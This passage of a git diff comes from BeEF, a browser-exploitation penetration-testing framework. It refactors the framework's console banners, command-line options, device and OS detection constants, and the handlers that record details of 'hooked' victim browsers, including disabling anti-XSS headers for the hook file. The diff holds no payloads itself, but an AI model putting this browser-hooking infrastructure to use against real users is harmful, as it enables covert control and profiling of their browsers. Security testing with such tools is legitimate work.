-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Extension
+module Core
 module Console

 module Banners
@@ -25,8 +15,8 @@ module Banners
    # Prints BeEF's ascii art
    #
    def print_ascii_art
-        if File.exists?('extensions/console/beef.ascii')
-            File.open('extensions/console/beef.ascii', 'r') do |f|
+        if File.exists?('core/main/console/beef.ascii')
+            File.open('core/main/console/beef.ascii', 'r') do |f|
                while line = f.gets
                    puts line 
                end
@@ -40,12 +30,13 @@ module Banners
    def print_welcome_msg
        config = BeEF::Core::Configuration.instance
        version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version #{version}\n"
-        data += "Website http://beefproject.com\n"
-        data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'git pull' to update to the latest revision."
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
+        data = "Twit: @beefproject\n"
+        data += "Site: http://beefproject.com\n"
+        data += "Blog: http://blog.beefproject.com\n"
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
        print_more data
+        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
    end

    #
@@ -89,11 +80,13 @@ module Banners

    def print_network_interfaces_routes
      configuration = BeEF::Core::Configuration.instance
+      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
      
      self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
        print_success "running on network interface: #{host}"
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
        
        print_more data
      end
@@ -104,13 +97,12 @@ module Banners
    #
    def print_loaded_extensions
      extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
      output = ''
-      
-      
-      extensions.each do |key,ext|
-        output += "#{ext['name']}\n"
-      end
+
+      #extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
+      #end
      
      print_more output
    end
--- a/extensions/console/beef.ascii
+++ b/extensions/console/beef.ascii
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -0,0 +1,72 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Console
+      #
+      # This module parses the command line argument when running beef.
+      #
+      module CommandLine
+
+        @options = Hash.new
+        @options[:verbose] = false
+        @options[:resetdb] = false
+        @options[:ascii_art] = false
+        @options[:ext_config] = ""
+        @options[:port] = ""
+        @options[:ws_port] = ""
+
+
+        @already_parsed = false
+
+        #
+        # Parses the command line arguments of the console.
+        # It also populates the 'options' hash.
+        #
+        def self.parse
+          return @options if @already_parsed
+
+          begin
+            optparse = OptionParser.new do |opts|
+              opts.on('-x', '--reset', 'Reset the database') do
+                @options[:resetdb] = true
+              end
+
+              opts.on('-v', '--verbose', 'Display debug information') do
+                @options[:verbose] = true
+              end
+
+              opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
+                @options[:ascii_art] = true
+              end
+
+              opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
+                @options[:ext_config] = f
+              end
+
+              opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p|
+                @options[:port] = p
+              end
+
+              opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
+                @options[:ws_port] = ws_port
+              end
+            end
+
+            optparse.parse!
+            @already_parsed = true
+            @options
+          rescue OptionParser::InvalidOption => e
+            puts "Invalid command line option provided. Please run beef --help"
+            exit 1
+          end
+        end
+
+      end
+
+    end
+  end
+end
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,79 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+module Core
+module Constants
+  
+  # @note The hardware's strings for hardware detection.
+  module Hardware
+
+    HW_UNKNOWN_IMG        = 'pc.png'
+	HW_IPHONE_UA_STR      = 'iPhone'
+ 	HW_IPHONE_IMG         = 'iphone.jpg'
+	HW_IPAD_UA_STR	      = 'iPad'
+	HW_IPAD_IMG	          = 'ipad.png'
+	HW_IPOD_UA_STR	      = 'iPod'
+	HW_IPOD_IMG	          = 'ipod.jpg'
+	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
+	HW_BLACKBERRY_IMG     = 'blackberry.png'
+	HW_WINPHONE_UA_STR    = 'Windows Phone'
+	HW_WINPHONE_IMG       = 'win.png'
+    HW_ZUNE_UA_STR        = 'ZuneWP7'
+    HW_ZUNE_IMG           = 'zune.gif'
+	HW_KINDLE_UA_STR      = 'Kindle'
+	HW_KINDLE_IMG         = 'kindle.png'
+	HW_NOKIA_UA_STR       = 'Nokia'
+	HW_NOKIA_IMG          = 'nokia.ico'
+	HW_HTC_UA_STR         = 'HTC'
+	HW_HTC_IMG            = 'htc.ico'
+	HW_MOTOROLA_UA_STR    = 'motorola'
+	HW_MOTOROLA_IMG       = 'motorola.png'
+	HW_GOOGLE_UA_STR      = 'Nexus One'
+	HE_GOOGLE_IM          = 'nexus.png'
+	HW_ERICSSON_UA_STR    = 'Ericsson'
+	HW_ERICSSON_IMG       = 'sony_ericsson.png'
+	HW_ALL_UA_STR         = 'All'
+
+        # Attempt to match operating system string to constant
+        # @param [String] name Name of operating system
+        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
+		def self.match_hardware(name)
+			case name.downcase
+				when /iphone/
+					HW_IPHONE_UA_STR
+				when /ipad/
+					HW_IPAD_UA_STR
+				when /ipod/
+					HW_IPOD_UA_STR
+				when /blackberry/
+					HW_BLACKBERRY_UA_STR
+				when /windows phone/
+					HW_WINPHONE_UA_STR
+				when /zune/
+					HW_ZUNE_UA_STR
+				when /kindle/
+					HW_KINDLE_UA_STR
+				when /nokia/
+					HW_NOKIA_UA_STR
+				when /motorola/
+					HW_MOTOROLA_UA_STR
+				when /htc/
+					HW_HTC_UA_STR
+				when /google/
+					HW_GOOGLE_UA_STR
+				when /ericsson/
+					HW_ERICSSON_UA_STR
+				else
+					'ALL'
+				end
+		end
+	
+  end
+  
+end
+end
+end
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,89 +1,78 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
-module Core
-module Constants
-  
-  # @note The OS'es strings for os detection.
-  module Os
-  
-    OS_UNKNOWN_IMG        = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
- 	OS_IPHONE_IMG         = 'iphone.png'
-	OS_IPAD_UA_STR	      = 'iPad'
-	OS_IPAD_IMG	      = 'ipad.png'
-	OS_IPOD_UA_STR	      = 'iPod'
-	OS_IPOD_IMG	      = 'ipod.jpg'
-	OS_MAEMO_UA_STR	      = 'Maemo'
-	OS_MAEMO_IMG	      = 'maemo.ico'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
-	OS_ANDROID_UA_STR     = 'Android'
-	OS_ANDROID_IMG        = 'android.png'
-    OS_ALL_UA_STR         = 'All'
+  module Core
+    module Constants
+
+      # @note The OS'es strings for os detection.
+      module Os
+
+        OS_UNKNOWN_IMG = 'unknown.png'
+        OS_WINDOWS_UA_STR = 'Windows'
+        OS_WINDOWS_IMG = 'win.png'
+        OS_LINUX_UA_STR = 'Linux'
+        OS_LINUX_IMG = 'linux.png'
+        OS_MAC_UA_STR = 'Mac'
+        OS_MAC_IMG = 'mac.png'
+        OS_QNX_UA_STR = 'QNX'
+        OS_QNX_IMG = 'qnx.ico'
+        OS_BEOS_UA_STR = 'BeOS'
+        OS_BEOS_IMG = 'beos.png'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
+        OS_OPENBSD_IMG = 'openbsd.ico'
+        OS_IOS_UA_STR = 'iOS'
+        OS_IOS_IMG = 'ios.png'
+        OS_IPHONE_UA_STR = 'iPhone'
+        OS_WEBOS_UA_STR = 'webos.png'
+        OS_IPHONE_IMG = 'iphone.jpg'
+        OS_IPAD_UA_STR = 'iPad'
+        OS_IPAD_IMG = 'ipad.png'
+        OS_IPOD_UA_STR = 'iPod'
+        OS_IPOD_IMG = 'ipod.jpg'
+        OS_MAEMO_UA_STR = 'Maemo'
+        OS_MAEMO_IMG = 'maemo.ico'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
+        OS_ANDROID_UA_STR = 'Android'
+        OS_ANDROID_IMG = 'android.png'
+        OS_ALL_UA_STR = 'All'

        # Attempt to match operating system string to constant
        # @param [String] name Name of operating system
        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
-			case name.downcase
-				when /win/
-					OS_WINDOWS_UA_STR
-				when /lin/
-					OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
-				when /qnx/
-					OS_QNX_UA_STR
-				when /beos/
-					OS_BEOS_UA_STR
-				when /openbsd/
-					OS_OPENBSD_UA_STR
-				when /iphone/
-					OS_IPHONE_UA_STR
-				when /ipad/
-					OS_IPAD_UA_STR
-				when /ipod/
-					OS_IPOD_UA_STR
-				when /maemo/
-					OS_MAEMO_UA_STR
-				when /blackberry/
-					OS_BLACKBERRY_UA_STR
-				when /android/
-					OS_ANDROID_UA_STR
-				else
-					'ALL'
-				end
-		end
-	
+        def self.match_os(name)
+          case name.downcase
+            when /win/
+              OS_WINDOWS_UA_STR
+            when /lin/
+              OS_LINUX_UA_STR
+            when /os x/, /osx/, /mac/
+              OS_MAC_UA_STR
+            when /qnx/
+              OS_QNX_UA_STR
+            when /beos/
+              OS_BEOS_UA_STR
+            when /openbsd/
+              OS_OPENBSD_UA_STR
+            when /ios/, /iphone/, /ipad/, /ipod/
+              OS_IOS_UA_STR
+            when /maemo/
+              OS_MAEMO_UA_STR
+            when /blackberry/
+              OS_BLACKBERRY_UA_STR
+            when /android/
+              OS_ANDROID_UA_STR
+            else
+              'ALL'
+          end
+        end
+
+      end
+
+    end
  end
-  
-end
-end
 end
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -36,6 +26,19 @@ module Core
      # return random hex string
      return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
    end
+
+    # Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
+    # After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
+    # @return [String] Security token
+    def self.api_token
+      config = BeEF::Core::Configuration.instance
+      token_length = 20
+
+      # return random hex string
+      token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
+      config.set('beef.api_token', token)
+      token
+    end
  
  end
 end
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,31 +1,18 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-  module Extension
-    module Initialization
-
-      #
-      # The http handler that manages the return of the initial browser details.
-      #
-      class Handler
+  module Core
+    module Handlers
+      # @note Retrieves information about the browser (type, version, plugins etc.)
+      class BrowserDetails

        @data = {}

        HB = BeEF::Core::Models::HookedBrowser
-        BD = BeEF::Extension::Initialization::Models::BrowserDetails
+        BD = BeEF::Core::Models::BrowserDetails

        def initialize(data)
          @data = data
@@ -33,7 +20,7 @@ module BeEF
        end

        def err_msg(error)
-          print_error "[INITIALIZATION] #{error}"
+          print_error "[Browser Details] #{error}"
        end

        def setup()
@@ -121,6 +108,22 @@ module BeEF
            self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
          end

+          # get and store the hardware name
+          hw_name = get_param(@data['results'], 'Hardware')
+          if BeEF::Filters.is_valid_hwname?(hw_name)
+            BD.set(session_id, 'Hardware', hw_name)
+          else
+            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+          end
+
+          # get and store the date
+          date_stamp = get_param(@data['results'], 'DateStamp')
+          if BeEF::Filters.is_valid_date_stamp?(date_stamp)
+            BD.set(session_id, 'DateStamp', date_stamp)
+          else
+            self.err_msg "Invalid date returned from the hook browser's initial connection."
+          end
+
          # get and store page title
          page_title = get_param(@data['results'], 'PageTitle')
          if BeEF::Filters.is_valid_pagetitle?(page_title)
@@ -169,22 +172,6 @@ module BeEF
            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
          end

-          # get and store the internal ip address
-          internal_ip = get_param(@data['results'], 'InternalIP')
-          if BeEF::Filters.is_valid_ip?(internal_ip)
-            BD.set(session_id, 'InternalIP', internal_ip)
-          else
-            self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
-          end
-
-          # get and store the internal hostname
-          internal_hostname = get_param(@data['results'], 'InternalHostname')
-          if BeEF::Filters.is_valid_hostname?(host_name)
-            BD.set(session_id, 'InternalHostname', internal_hostname)
-          else
-            self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
-          end
-
          # get and store the hooked browser type
          browser_type = get_param(@data['results'], 'BrowserType')
          if BeEF::Filters.is_valid_browsertype?(browser_type)
@@ -194,11 +181,11 @@ module BeEF
          end

          # get and store the zombie screen size and color depth
-          screen_params = get_param(@data['results'], 'ScreenParams')
-          if BeEF::Filters.is_valid_screen_params?(screen_params)
-            BD.set(session_id, 'ScreenParams', screen_params)
+          screen_size = get_param(@data['results'], 'ScreenSize')
+          if BeEF::Filters.is_valid_screen_size?(screen_size)
+            BD.set(session_id, 'ScreenSize', screen_size)
          else
-            self.err_msg "Invalid screen params returned from the hook browser's initial connection."
+            self.err_msg "Invalid screen size returned from the hook browser's initial connection."
          end

          # get and store the window size
@@ -233,6 +220,14 @@ module BeEF
            self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
          end

+          # get and store the yes|no value for HasPhonegap
+          has_phonegap = get_param(@data['results'], 'HasPhonegap')
+          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+            BD.set(session_id, 'HasPhonegap', has_phonegap)
+          else
+            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+          end
+
          # get and store the yes|no value for HasGoogleGears
          has_googlegears = get_param(@data['results'], 'HasGoogleGears')
          if BeEF::Filters.is_valid_yes_no?(has_googlegears)
@@ -274,7 +269,7 @@ module BeEF
          end

          # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"


          # Call autorun modules
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,90 +1,81 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-  
-  class Commands
-    
-    include BeEF::Core::Handlers::Modules::BeEFJS
-    include BeEF::Core::Handlers::Modules::Command
-    
-    @data = {}
-    
-    # Handles command data
-    # @param [Hash] data Data from command execution
-    # @param [Class] kclass Class of command
-    # @todo Confirm argument data variable type.
-    def initialize(data, kclass)
-      @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
-      @data = data
-      setup()
-    end
-    
-    # Initial setup function, creates the command module and saves details to datastore
-    def setup()
+  module Core
+    module Handlers
+
+      class Commands
+
+        include BeEF::Core::Handlers::Modules::BeEFJS
+        include BeEF::Core::Handlers::Modules::Command
+
+        @data = {}
+
+        # Handles command data
+        # @param [Hash] data Data from command execution
+        # @param [Class] kclass Class of command
+        # @todo Confirm argument data variable type [radoen]: type is Hash confirmed.
+        def initialize(data, kclass)
+          @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
+          @data = data
+          setup()
+        end
+
+        # Initial setup function, creates the command module and saves details to datastore
+        def setup()


-      @http_params = @data['request'].params
-      @http_header = Hash.new
-      http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'}
-                      .each {|key,value|
-                            @http_header[key.sub(/^HTTP_/, '')] = value
-                      }
+          @http_params = @data['request'].params
+          @http_header = Hash.new
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }.each { |key, value|
+            @http_header[key.sub(/^HTTP_/, '')] = value
+          }

-      # @note get and check command id from the request
-      command_id  = get_param(@data, 'cid')
-      # @todo ruby filter needs to be updated to detect fixnums not strings
-      command_id = command_id.to_s()
-      (print_error "command_id is invalid";return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())
+          # @note get and check command id from the request
+          command_id = get_param(@data, 'cid')
+          # @todo ruby filter needs to be updated to detect fixnums not strings
+          command_id = command_id.to_s()
+          (print_error "command_id is invalid"; return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())

-      # @note get and check session id from the request
-      beefhook = get_param(@data, 'beefhook')
-      (print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+          # @note get and check session id from the request
+          beefhook = get_param(@data, 'beefhook')
+          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+
+          result = get_param(@data, 'results')
+
+          # @note create the command module to handle the response
+          command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
+          command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
+          command.session_id = beefhook
+          if command.respond_to?(:post_execute)
+            command.post_execute
+          end
+          #@todo this is the part that store result on db and the modify will be accessible from all the framework and so UI too
+          # @note get/set details for datastore and log entry
+          command_friendly_name = command.friendlyname
+          (print_error "command friendly name is empty"; return) if command_friendly_name.empty?
+          command_results = get_param(@data, 'results')
+          (print_error "command results are empty"; return) if command_results.empty?
+          # @note save the command module results to the datastore and create a log entry
+          command_results = {'data' => command_results}
+          BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results)
+
+        end
+
+        # Returns parameter from hash
+        # @param [Hash] query Hash of data to return data from
+        # @param [String] key Key to search for and return inside `query`
+        # @return Value referenced in hash at the supplied key
+        def get_param(query, key)
+          return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
+        end

-      # @note create the command module to handle the response
-      command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))  
-      command.build_callback_datastore(@http_params, @http_header) 
-      command.session_id = beefhook 
-      if command.respond_to?(:post_execute)
-        command.post_execute
      end

-      # @note get/set details for datastore and log entry
-      command_friendly_name = command.friendlyname
-      (print_error "command friendly name is empty";return) if command_friendly_name.empty?
-      command_results = get_param(@data, 'results')
-      (print_error "command results are empty";return) if command_results.empty?
-      # @note save the command module results to the datastore and create a log entry
-      command_results = {'data' => command_results}
-      BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results) 

    end
-    
-    # Returns parameter from hash
-    # @param [Hash] query Hash of data to return data from
-    # @param [String] key Key to search for and return inside `query`
-    # @return Value referenced in hash at the supplied key
-    def get_param(query, key)
-        return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
-    end
-
  end
-    
-  
-end
-end
 end
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,59 +1,51 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
 module Handlers
  
   # @note This class handles connections from hooked browsers to the framework.
-    class HookedBrowsers
+    class HookedBrowsers < BeEF::Core::Router::Router

    
    include BeEF::Core::Handlers::Modules::BeEFJS
    include BeEF::Core::Handlers::Modules::Command

+    #antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
+    configure do
+      disable :protection
+    end
    
    # Process HTTP requests sent by a hooked browser to the framework.
    # It will update the database to add or update the current hooked browser
    # and deploy some command modules or extensions to the hooked browser.
-    def call(env)
+    get '/' do
      @body = ''
-      @request = Rack::Request.new(env)
-      @params = @request.query_string
-      @response = Rack::Response.new(body=[], 200, header={})
+      @params = request.query_string
+      #@response = Rack::Response.new(body=[], 200, header={})
      config = BeEF::Core::Configuration.instance
      
      # @note check source ip address of browser
      permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
      target_network = IPAddr.new(permitted_hooking_subnet)
-      if not target_network.include?(@request.ip)
-        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
-        @response = Rack::Response.new(body=[], 500, header={})
-        return
+      if not target_network.include?(request.ip)
+        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
+        error 500
      end

      # @note get zombie if already hooked the framework
      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_id = @request[hook_session_name]
+      hook_session_id = request[hook_session_name]
      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?

      # @note is a new browser so return instructions to set up the hook
      if not hooked_browser 
        
        # @note generate the instructions to hook the browser
-        host_name = @request.host 
+        host_name = request.host
        (print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
        build_beefjs!(host_name)

@@ -63,9 +55,9 @@ module Handlers
        hooked_browser.lastseen = Time.new.to_i
        
        # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != @request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = @request.ip
+        if hooked_browser.ip != request.ip
+          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+          hooked_browser.ip = request.ip
        end
      
        hooked_browser.count!
@@ -76,37 +68,18 @@ module Handlers
        zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}

        # @note We dynamically get the list of all browser hook handler using the API and register them
